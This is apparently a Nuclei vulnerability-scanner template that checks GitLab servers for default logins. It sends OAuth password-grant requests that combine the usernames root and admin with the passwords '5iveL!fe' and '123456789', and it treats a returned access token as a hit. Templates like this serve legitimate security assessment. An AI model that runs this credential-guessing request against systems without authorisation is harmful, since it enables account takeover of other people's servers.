id: gitlab-weak-login

info:
  name: Gitlab Default Login
  author: Suman_Kar,dwisiswant0
  severity: high
  description: Gitlab default login credentials were discovered.
  reference:
    - https://twitter.com/0xmahmoudJo0/status/1467394090685943809
    - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
  classification:
    cwe-id: CWE-798
  metadata:
    max-request: 6
    shodan-query: http.title:"GitLab"
  tags: gitlab,default-login

http:
  - raw:
      - |
        POST /oauth/token HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Referer: {{BaseURL}}
        content-type: application/json

        {"grant_type":"password","username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - "root"
        - "admin"
        - "admin@local.host"
      password:
        - "5iveL!fe"
        - "123456789"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - application/json

      - type: word
        part: body
        words:
          - '"access_token":'
          - '"token_type":'
          - '"refresh_token":'
        condition: and

# digest: 490a00463044022046b016d8df18dcff00ce41916e0870b3f20c707fc3edd900dbf9897898a41c0d022048a9aeebcf2906096985bd0cadec4bafd6bfa5dd5b3bbd959b1d3c5b0eb4186e:922c64590222798bb761d5b6d8e72950